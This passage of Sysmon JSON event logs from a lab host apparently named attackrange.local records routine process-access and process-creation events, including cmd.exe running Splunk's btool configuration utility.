05:46:49.828","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2058,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.828\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01C9-5F25-0000-00101EEA0300}\r\nTargetProcessId: 2532\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.828","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01C9-5F25-0000-00101EEA0300}","TargetProcessId":"2532","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2059,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.842\r\nProcessGuid: {A837DB8D-01C9-5F25-0000-0010DAEA0300}\r\nProcessId: 2524\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {A837DB8D-01C9-5F25-0000-00101EEA0300}\r\nParentProcessId: 2532\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.842","ProcessGuid":"{A837DB8D-01C9-5F25-0000-0010DAEA0300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{A837DB8D-01C9-5F25-0000-00101EEA0300}","ParentProcessId":"2532","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2060,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.828\r\nSourceProcessGUID: {A837DB8D-01C9-5F25-0000-00101EEA0300}\r\nSourceProcessId: 2532\r\nSourceThreadId: 3996\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {A837DB8D-01C9-5F25-0000-0010DAEA0300}\r\nTargetProcessId: 2524\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.828","SourceProcessGUID":"{A837DB8D-01C9-5F25-0000-00101EEA0300}","SourceProcessId":"2532","SourceThreadId":"3996","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{A837DB8D-01C9-5F25-0000-0010DAEA0300}","TargetProcessId":"2524","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2061,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.828\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C9-5F25-0000-0010DAEA0300}\r\nTargetProcessId: 2524\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.828","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C9-5F25-0000-0010DAEA0300}","TargetProcessId":"2524","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2062,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.828\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.828","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2063,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.828\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.828","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2064,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.828\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.828","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2065,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.828\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.828","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2066,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.828\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 